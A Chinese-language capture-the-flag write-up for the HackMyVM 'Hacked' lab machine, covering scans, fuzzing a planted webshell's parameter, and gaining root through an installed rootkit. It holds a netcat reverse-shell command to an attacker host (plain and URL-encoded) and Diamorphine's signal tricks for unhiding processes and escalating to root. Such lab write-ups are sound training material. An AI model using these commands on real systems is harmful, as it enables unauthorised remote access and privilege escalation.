【hackmyvm】hacked靶机wp

---

tags:

• HMV
• rootkit
• Diamorphine
  Type: wp

1. 基本信息^toc

靶机链接 https://hackmyvm.eu/machines/machine.php?vm=Hacked
作者 sml
难度 ⭐️⭐️⭐️⭐️️

2. 信息收集

2.1. 端口扫描

┌──(root㉿kali)-[/home/kali/hmv/hacked]
└─# fscan -h 192.168.42.185___                              _/ _ \     ___  ___ _ __ __ _  ___| | __/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\fscan version: 1.8.4
start infoscan
192.168.42.185:22 open
192.168.42.185:80 open

主页

┌──(root㉿kali)-[/home/kali/hmv/hacked]
└─# curl http://192.168.42.185/
HACKED BY h4x0r

2.2. 目录扫描

┌──(root㉿kali)-[/home/kali/hmv/hacked]
└─# dirsearch -u http://192.168.42.185/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.htmlfrom pkg_resources import DistributionNotFound, VersionConflict_|. _ _  _  _  _ _|_    v0.4.3(_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460Output File: /home/kali/hmv/hacked/reports/http_192.168.42.185/__24-12-01_18-09-55.txtTarget: http://192.168.42.185/[18:09:55] Starting:
[18:10:13] 200 -   16B  - /robots.txt
[18:10:14] 302 -   62B  - /simple-backdoor.php  ->  /

┌──(root㉿kali)-[/home/kali/hmv/hacked]
└─# curl http://192.168.42.185/robots.txt
/secretnote.txt┌──(root㉿kali)-[/home/kali/hmv/hacked]
└─# curl http://192.168.42.185//secretnote.txt
[X] Enumeration
[X] Exploitation
[X] Privesc
[X] Maintaining Access.|__> Webshell installed.|__> Root shell created.-h4x0r┌──(root㉿kali)-[/home/kali/hmv/hacked]
└─# curl http://192.168.42.185//simple-backdoor.php
I modified this webshell to only execute my secret parameter.

收集到的信息

用户 h4x0r 
webshell    /simple-backdoor.php
执行参数 未知

2.3. 获取参数

从收集的这些信息当中猜测Webshell的参数
试了几个参数都不对。猜测可能是需要爆破才行

┌──(root㉿kali)-[/home/kali/hmv/hacked]
└─# ffuf -u http://192.168.42.185/simple-backdoor.php?FUZZ=id -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt |grep -v "Size: 62"/'___\  /'___\           /'___\/\ \__/ /\ \__/  __  __  /\ \__/\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/\ \_\   \ \_\  \ \____/  \ \_\\/_/    \/_/   \/___/    \/_/v2.1.0-dev
________________________________________________:: Method           : GET:: URL              : http://192.168.42.185/simple-backdoor.php?FUZZ=id:: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt:: Follow redirects : false:: Calibration      : false:: Timeout          : 10:: Threads          : 40:: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________secret                  [Status: 302, Size: 115, Words: 12, Lines: 2, Duration: 19ms]

获取到参数是 secret 之前有在网页试过这个参数。应该是302了导致没有显示出来
抓包的话可以看到

弹shell

nc -e /bin/bash 192.168.42.39 1111
nc%20-e%20%2Fbin%2Fbash%20192.168.42.39%201111

[18:42:48] Welcome to pwncat 🐈!                                                              __main__.py:164
[18:46:34] received connection from 192.168.42.185:36606                                           bind.py:84
[18:46:35] 192.168.42.185:36606: registered new host w/ db                                     manager.py:957
(local) pwncat$
(remote) www-data@hacked:/var/www/html$ whoami
www-data
(remote) www-data@hacked:/var/www/html$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
(remote) www-data@hacked:/var/www/html$

3. 提权

这靶机上gcc编译不了。找不到Ld
可以尝试从其他版本相近的靶机编译后传过来。
这里我就不尝试了

使用linpeas进行检测。也没有发现什么利用点

去看一下wp才发现原来这里存在Rootkit
https://github.com/m0nad/Diamorphine

kill -63 0 取消隐藏进程
lsmod 列出加载到内核中的模块

可以看到确实安装了[[…/…/26-工具使用/Diamorphine使用|Diamorphine]]

[[…/…/26-工具使用/Diamorphine使用|海洛因]]有一个特征

我们发送信号64即可获取到root

(remote) www-data@hacked:/tmp$ kill -64 0
(remote) root@hacked:/tmp$ id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

(remote) root@hacked:/root$ sh flag.sh.     ***           *.,**,,                         ,*.,                              *,/                                    *,*                                        *,/.                                            .*.*                                                  **,*                                               ,***                                          *.**                                    **.,*                                ***,                          ,**                      ***,                .**.           ****      ,*,** *,
-------------------------PWNED HOST: hackedPWNED DATE: Sun Dec  1 06:32:33 EST 2024WHOAMI: uid=0(root) gid=0(root) groups=0(root),33(www-data)FLAG: HMVhackingthehacker------------------------remote) root@hacked:/home/h4x0r$ sh flag.sh.     ***           *.,**,,                         ,*.,                              *,/                                    *,*                                        *,/.                                            .*.*                                                  **,*                                               ,***                                          *.**                                    **.,*                                ***,                          ,**                      ***,                .**.           ****      ,*,** *,
-------------------------PWNED HOST: hackedPWNED DATE: Sun Dec  1 06:32:55 EST 2024WHOAMI: uid=0(root) gid=0(root) groups=0(root),33(www-data)FLAG: HMVimthabesthacker------------------------